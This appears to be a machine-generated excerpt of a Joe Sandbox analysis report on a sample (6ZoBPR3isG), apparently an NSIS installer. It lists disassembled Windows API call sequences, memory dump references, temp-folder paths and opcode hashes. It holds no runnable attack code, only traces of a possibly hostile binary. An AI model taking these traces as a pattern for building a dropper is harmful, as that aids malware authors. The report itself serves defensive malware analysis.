                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 2667972263-0
                                                                                                              • Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                              • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                              • Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                              • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • wsprintfW.USER32 ref: 00404CB6
                                                                                                              • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                              • String ID: %u.%u%s%s$(7B
                                                                                                              • API String ID: 3540041739-1320723960
                                                                                                              • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                              • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                              • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                              • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                              APIs
                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsz9A57.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsz9A57.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWidelstrlen
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsz9A57.tmp$C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll
                                                                                                              • API String ID: 3109718747-952112840
                                                                                                              • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                              • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                                                                              • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                              • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeGlobal
                                                                                                              • String ID:
                                                                                                              • API String ID: 2979337801-0
                                                                                                              • Opcode ID: 0ed9285418febdf2630cba6e0d5f89ba6d74cc88c3293561ea0a4fc02060f91f
                                                                                                              • Instruction ID: 7eb55a72fbfd73d821150279022e361195eb8b3ffe683ac36ba768deb61aef3c
                                                                                                              • Opcode Fuzzy Hash: 0ed9285418febdf2630cba6e0d5f89ba6d74cc88c3293561ea0a4fc02060f91f
                                                                                                              • Instruction Fuzzy Hash: AC511832E5095AEFFB229FA488407AD77FAEB443D0B05427AD407E3184D6709E81879D
                                                                                                              APIs
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73F924D6
                                                                                                                • Part of subcall function 73F9122C: lstrcpynW.KERNEL32(00000000,?,73F912DF,00000019,73F911BE,-000000A0), ref: 73F9123C
                                                                                                              • GlobalAlloc.KERNEL32(00000040), ref: 73F9245C
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73F92477
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                              • String ID:
                                                                                                              • API String ID: 4216380887-0
                                                                                                              • Opcode ID: 8f7f8f957f0ec0533607fb074a2db11bdae9b8afe4d4744a4615bde8e6c0e0bc
                                                                                                              • Instruction ID: b449027932c067661f8cf8ce748cd314bb1aadf9f1fda6c6ca71e38dafc87b8a
                                                                                                              • Opcode Fuzzy Hash: 8f7f8f957f0ec0533607fb074a2db11bdae9b8afe4d4744a4615bde8e6c0e0bc
                                                                                                              • Instruction Fuzzy Hash: 1A418CB240430EEFF325EF25DC54F6A77F8EB48390B124929E44BC6591EB70A548CB69
                                                                                                              APIs
                                                                                                              • GetDC.USER32(?), ref: 00401DBC
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                              • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                              • String ID:
                                                                                                              • API String ID: 3808545654-0
                                                                                                              • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                              • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                              • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                              • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                              APIs
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73F921EC,?,00000808), ref: 73F91635
                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,73F921EC,?,00000808), ref: 73F9163C
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73F921EC,?,00000808), ref: 73F91650
                                                                                                              • GetProcAddress.KERNEL32(73F921EC,00000000), ref: 73F91657
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73F91660
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1148316912-0
                                                                                                              • Opcode ID: 2a27496a38acd3a13b8c6f93d8002ee7e161ef9d0e1288b96756767234c3e5e9
                                                                                                              • Instruction ID: 74168db8c895cf8de0f385ff9cacb394009d8b86a45d27f61fe9ff4f69a0b5e9
                                                                                                              • Opcode Fuzzy Hash: 2a27496a38acd3a13b8c6f93d8002ee7e161ef9d0e1288b96756767234c3e5e9
                                                                                                              • Instruction Fuzzy Hash: 6AF0F8732061387B963077A78C48DABBE9CDF9B2F5B220211F629E21B086614C01DBF1
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1849352358-0
                                                                                                              • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                              • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                              • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                              • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                              APIs
                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Timeout
                                                                                                              • String ID: !
                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                              • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                              • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                              • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                              • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 2659869361-3916508600
                                                                                                              • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                              • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                                              • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                              • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                                              APIs
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76133180,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76133180,00000000), ref: 00405D76
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                              • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,76133180,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76133180,00000000), ref: 00405E1E
                                                                                                              • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76133180,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76133180), ref: 00405E2E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                              • String ID: 0_B
                                                                                                              • API String ID: 3248276644-2128305573
                                                                                                              • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                              • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                              • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                              • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                              APIs
                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                              Strings
                                                                                                              • Error launching installer, xrefs: 004059E4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                              • String ID: Error launching installer
                                                                                                              • API String ID: 3712363035-66219284
                                                                                                              • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                              • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                              • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                              • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76133180,00403A1A,761336C0,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                                                                              • GlobalFree.KERNEL32(?), ref: 00403A64
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 1100898210-3916508600
                                                                                                              • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                              • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                                                                              • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                              • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 73F9116A
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73F911C7
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73F911D9
                                                                                                              • GlobalFree.KERNEL32(?), ref: 73F91203
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$Alloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1780285237-0
                                                                                                              • Opcode ID: 405d9a0a59d3d50cf25b8b740af6b7f7fea6bb61c045c1b5628a5e8a4587ce7b
                                                                                                              • Instruction ID: becacad73157ef8428c13353141df505d75a110d6fa9dbb1d147a3024b3a4239
                                                                                                              • Opcode Fuzzy Hash: 405d9a0a59d3d50cf25b8b740af6b7f7fea6bb61c045c1b5628a5e8a4587ce7b
                                                                                                              • Instruction Fuzzy Hash: 9231A3B3900606EFF300AF65C955B2977FCEB452D0725013AE84BEB274E734D8418B68
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                              • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
